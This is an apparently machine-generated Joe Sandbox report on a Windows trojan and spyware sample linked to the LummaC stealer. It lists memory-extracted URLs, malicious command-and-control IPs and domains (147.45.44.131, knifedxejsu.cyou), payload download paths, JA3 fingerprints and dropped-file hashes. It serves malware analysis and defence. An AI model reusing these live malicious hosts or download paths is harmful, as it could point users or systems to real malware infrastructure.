http://polymer.github.io/PATENTS.txt	chrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970825869.000009B401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971344270.000009B401664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971109499.000009B401630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview	chrome.exe, 00000008.00000003.1000143016.000009B401C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.999704489.000009B401C18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.999615366.000009B401C14000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/dl/release2/chrome_component/actfcfanl4hq5aaxnnweccjxua6q_2024.11.6.1/jflhchcc	chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/349489248	chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966655744.000009B400A84000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.ico	chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/search?q=autoit	chrome.exe, 00000008.00000003.1547148807.000009B400E4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137867691.000009B40114C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129316003.000009B400004000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.teacherspayteachers.com/Cart	chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.lulus.com/checkout/bag	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.costco.com/CheckoutCartDisplayView	chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ae.com/us/en/cart	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplay	chrome.exe, 00000008.00000002.2131890551.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400664000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.qvc.com/checkout/cart.html	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://knifedxejsu.cyou/	RegAsm.exe, 00000007.00000002.1062369074.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://dl.google.com/release2/chrome_component/p2zbkxfgkqyr6ljey2oe3bnzoy_2023.11.29.1201/ggkkehgbnf	chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cart.ebay.com/	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.google.com/release2/chrome_component/cvde376f6tyxybuonyzcqfilye_2024.10.30.0/niikhdgajlph	chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf	chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137098219.000009B401014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135014565.000009B400C9C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132840549.000009B400848000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/	chrome.exe, 00000008.00000002.2138838858.000009B4012CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132114432.000009B400728000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-	chrome.exe, 00000008.00000002.2139072537.000009B401320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.gamestop.com/cart/	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://googleads.g.doubleclick.net/xbbe/pixel?d=CICfxAEQ7KXQkAIY7dHaqQEwAQ&v=APEucNV8Higyb1mdtfCkDQ	chrome.exe, 00000008.00000002.2137914589.000009B40115C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.boostmobile.com/cart.html	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://packetstormsecurity.com/	chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.samsclub.com/cart	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com	chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140458716.000009B401545000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.eicar.org/	chrome.exe, 00000008.00000003.1547553627.000009B4004BB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 00000008.00000002.2131890551.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135014565.000009B400C9C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.kohls.com/checkout/shopping_cart.jsp	chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.overstock.com/cart	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bloomingdales.com/my-bag	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	chrome.exe, 00000008.00000003.952900184.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985381985.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1712409873.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1110933299.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1270303469.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969800499.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1323174553.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130454553.000009B40023C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.crateandbarrel.com/Checkout/Cart	chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/dl/release2/chrome_component/acowdfe2t76yuidsex3ifs6nk3da_20241026.690810062.	chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/s/notifications/manifest/cr_install.htmlult	chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.google.com/release2/chrome_component/acowdfe2t76yuidsex3ifs6nk3da_20241026.690810062.14/o	chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients4.google.com/chrome-sync	chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.newegg.com/shop/cart	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com.txt	chrome.exe, 00000008.00000002.2136147812.000009B400E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143963162.000009B4022B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.eicar.org	chrome.exe, 00000008.00000002.2136147812.000009B400E84000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=searchTerms	chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8	chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046293799.000009B4020E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.jcrew.com/checkout/cart	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/dl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/gonpemdgk	chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://signup.live.com	chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	false		high
https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=90&slotn	chrome.exe, 00000008.00000003.1046908626.000009B401A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046419239.000009B40155C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://windows-drivers-x04.blogspot.com	chrome.exe, 00000008.00000002.2131238480.000009B4003C0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/presentation/J	chrome.exe, 00000008.00000002.2130129822.000009B400178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exe	chrome.exe, 00000008.00000002.2131960348.000009B400688000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141082802.000009B40175C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
147.45.44.131	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.19.177	knifedxejsu.cyou	United States	13335	CLOUDFLARENETUS	true
142.251.35.164	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.11.20
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1551388
Start date and time:	2024-11-07 17:51:31 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	7IXl1M9JGV.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@47/19@5/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 47 Number of non-executed functions: 66
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.81.227, 142.251.40.110, 172.253.115.84, 34.104.35.123, 142.251.41.3, 142.250.65.202, 142.251.40.234, 142.250.65.170, 142.251.40.138, 142.251.40.106, 142.251.41.10, 142.250.80.42, 142.251.40.170, 142.250.80.106, 142.251.35.170, 142.250.64.106, 142.251.40.202, 142.250.72.106, 142.250.80.10, 142.250.176.202, 142.250.80.74, 199.232.210.172, 23.51.58.94, 142.250.81.234, 172.217.165.138, 142.251.32.106, 142.250.65.234, 104.79.84.139, 23.199.50.2
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 7IXl1M9JGV.exe

Simulations

Behavior and APIs

Time	Type	Description
11:55:09	API Interceptor	32x Sleep call for process: powershell.exe modified
11:55:13	API Interceptor	8x Sleep call for process: RegAsm.exe modified
11:55:41	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.45.44.131	Rechnung_643839483.pdf.lnk	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/cdeea.exe
	file.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/gqgqg.exe
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	147.45.44.131/files/tpgl053.exe
	ptgl503.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/gpto03.exe
	Suselx1.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/g5.exe
	gkqg90.ps1	Get hash	malicious	LummaC	Browse	147.45.44.131/files/otqp9.exe
	test.bat	Get hash	malicious	MicroClip	Browse	147.45.44.131/files/tpgl053.exe
	009.ps1	Get hash	malicious	LummaC	Browse	147.45.44.131/files/98.exe
	ir57.ps1	Get hash	malicious	LummaC	Browse	147.45.44.131/files/yqy9.exe
239.255.255.250	http://www.creativeformatsnetwork.com/690e2a7d88062e0c7bf23f5d01b4ab6b/invoke.js	Get hash	malicious	Unknown	Browse
	https://issuu.com/onlinedocumentpdf/docs/documentation?fr=xKAE9_zU1NQ	Get hash	malicious	Unknown	Browse
	Attachment-551059325-009.pdf	Get hash	malicious	Unknown	Browse
	vMRlWtVCEN.exe	Get hash	malicious	Stealc, Vidar	Browse
	c54f4c04-95c8-e3ea-7c13-45cbc3ee9b45.eml	Get hash	malicious	Unknown	Browse
	https://truckstop.one/as/authorize?client_id=7a99fb37-0cbd-4526-a557-bd283b9e9cf4&redirect_uri=https%253a%252f%252fapp.truckstop.com%252flanding%252fpingexternallogincallback&response_type=code%2520id_token%2520token&state=openidconnect.authenticationproperties%253dd1azkrievou5xvfp-qj6lz4lvhnji_zurlus4dg4kpfyaz8_l_zh9eagafd4qs-4bp_xmv_gxhfi9cicmwuipdyvxvvyerzotaovt3vtqf9ajzj3wmqtyitt_jeovipdmigoy5j_5dpehnbhcu93ulmdxyuni7lptn61kjfj7vt78qwvlvinfcjk1ngsl46tbysxh2azfm_i1dlik1uodaqthlvy6gtmnpueowutlftvhwsb7ejrpju0ggwa6pbfqx5adq&response_mode=form_post&nonce=638448261415283047.mdq2yjfinjytmwrjyi00ote4lwi3yjitodyzytm5ymu3mdbmotkxmzeyzdmtmzm5nc00yzq2lthlnjktmdvindc5njg3owjk&x-client-sku=id_net461&x-client-ver=7.0.1.0	Get hash	malicious	Unknown	Browse
	d01SFZW0Tt.exe	Get hash	malicious	Unknown	Browse
	http://eon.keit.re.kr/WEOMTRACK.html?CPKN=O&CPSQ=88327186&CPSC=0&CPID=16122900000005&CPMEM=MTAwMDkwODg%3D&CLID=006&CLKN=CL&CPCED=20171231&DRTMF=5&DRTMT=60&URL=https://form.jotform.com/243104959551055	Get hash	malicious	Unknown	Browse
	http://ebook-hunter.org	Get hash	malicious	Unknown	Browse
	https://portafirmas.metromadrid.net/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
knifedxejsu.cyou	PV2Ch2EAZe.exe	Get hash	malicious	LummaC	Browse	172.67.187.9
knifedxejsu.cyou	L#U043e#U0430der.exe	Get hash	malicious	LummaC	Browse	172.67.187.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	vUWhc67uSc.exe	Get hash	malicious	StormKitty	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC	Browse	172.67.133.135
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.5.155
	Invoice-250288895-001-4031394-5629578.js	Get hash	malicious	Unknown	Browse	188.114.97.3
	vUWhc67uSc.exe	Get hash	malicious	StormKitty	Browse	172.67.74.152
	https://issuu.com/onlinedocumentpdf/docs/documentation?fr=xKAE9_zU1NQ	Get hash	malicious	Unknown	Browse	104.17.24.14
	VjIFOc2E1i.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.133.135
	Attachment-551059325-009.pdf	Get hash	malicious	Unknown	Browse	188.114.96.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.16.142
	2Qx5a1PR8h.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.133.135
FREE-NET-ASFREEnetEU	Set-up.exe	Get hash	malicious	LummaC	Browse	147.45.47.81
	mpsl.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	arm7-20241104-0018.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	na.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	SecuriteInfo.com.Win32.Malware-gen.1695.31617.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	193.233.254.0
	8mxzNuOrmA.exe	Get hash	malicious	PrivateLoader	Browse	147.45.47.169
	8mmCiIv2Y1.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	147.45.45.201
	8mxzNuOrmA.exe	Get hash	malicious	PrivateLoader	Browse	147.45.47.169
	harm4.elf	Get hash	malicious	Unknown	Browse	193.233.193.45

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	104.21.19.177
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.19.177
	Invoice-250288895-001-4031394-5629578.js	Get hash	malicious	Unknown	Browse	104.21.19.177
	VjIFOc2E1i.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.19.177
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.19.177
	2Qx5a1PR8h.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.19.177
	RvWTDQm7yl.exe	Get hash	malicious	LummaC	Browse	104.21.19.177
	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	104.21.19.177
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.19.177
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.19.177

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.16327664294449357
Encrypted:	false
SSDEEP:	384:mJHL7HbahIfcjcidIiBysHciXBs78MmhRht43mKdyrf6YM5iDEkiwou63oK6F:mJP74rzc8Myr43mNrf6YM5imZUF
MD5:	03E77017EE7DF7E1275CEBAF7CA8EF76
SHA1:	F3EAF01F831AC1DCCA7827F0B13DB864B48368BD
SHA-256:	D13EC78C6EBC504AAE3F59352035F444C7823AE4FE59878CE9F2112B7BC9D110
SHA-512:	7E84E37116293C4B7B504C79693829BB202A26D5C89223C8EC51BC186EBF259914A92F423906CE084C4B35B92CBCE617C6A4B66ABEF8D3C38A97DC151835727F
Malicious:	false
Preview:	...........@..@.3...{g.....yo.........<.....).9...y..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................;..........v[.2}c}c.#.........`h.d...............h.<.....6.:......p..*9...y..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xcfc451b7, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1048576
Entropy (8bit):	0.8697513943237657
Encrypted:	false
SSDEEP:	1536:DSB2qSB2gSjlK/LfDalKohVF8/bGLBSBLil2d/3Cr5DHzk/3A5v7GoCnLKxKHKrx:DapaQK0yfOD8F31Xw
MD5:	29CC7030CB74F5A362B80232D9BD6712
SHA1:	922F474C35932112D2D9F2F222427FB1945ACEB9
SHA-256:	49E319DF3CBA4481E15B4CC2DD387F45B0F730EBA8088480695B5BE2A8EF5BC2
SHA-512:	6949F18DBCD47F8F2420345B38A14F39DD15CBD148CFC02F58EE7E1AAED3D5A3323E46FBADD4E0A19A927DD490CEDAB5973E4A54E9AA68FA0F9044373662DD13
Malicious:	false
Preview:	..Q.... ................p..9...y........................0..........\|).7...\|}.h.2...........................).9...y..........................................................................................................bJ......n....@...................................................................................................... ........3...{g......................................................................................................................................................................................................................................!m<7...\|} .................>..*7...\|}..........................#......h.2.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08037081319821053
Encrypted:	false
SSDEEP:	3:m9sMoWDXsBj4i4uRFE5/ll/SYXallo0lJlbxvws:mdqj3LRi5/llKYeL
MD5:	CA14724D949F1B4020BB3E5DC89D6A1A
SHA1:	C31EB32485149042B0541D6631A00CCCEDD406A3
SHA-256:	F28B9531DA5D986EDA27BD02D1CD3EE38AD80CBD4B9B994A10D423665AB2B1F8
SHA-512:	F09DEBC525E4AFA9054866E45CC1775A1EFE5712C214C885E2352F32445DB82D5432DD21795AB69C01ED2B2969FBC387404ACCF265754B11E0E00271F1009C96
Malicious:	false
Preview:	7.._....................................9...y..7...\|}......\|)..............\|)......\|)..C.t.....\|)O.................>..*7...\|}.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\RES267D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Thu Nov 7 16:55:12 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1332
Entropy (8bit):	3.994879980324705
Encrypted:	false
SSDEEP:	24:HdFzW91vMAhp51H+wK1mNII+ycuZhN+akS2PNnqS2d:iMOj9K1mu1ul+a3KqSG
MD5:	C8B93A24B9E33FD7BF9C0DA6A7179C3E
SHA1:	5BBF0799B81C2BC9D94215FA191B3CB275FBFFF0
SHA-256:	C65F8DF390B31B77ADEA935BA3C984D3968D7049B9946768C2BA145F87416581
SHA-512:	50375A5D54ED920E44B1E7418FB7BD9E1264FF6AEF113F9B8BF9E9EBFF0F8BAD708B1DF87451FF6B0601510A01CB2E153864F0A854FB98B405FFC5C98538950D
Malicious:	false
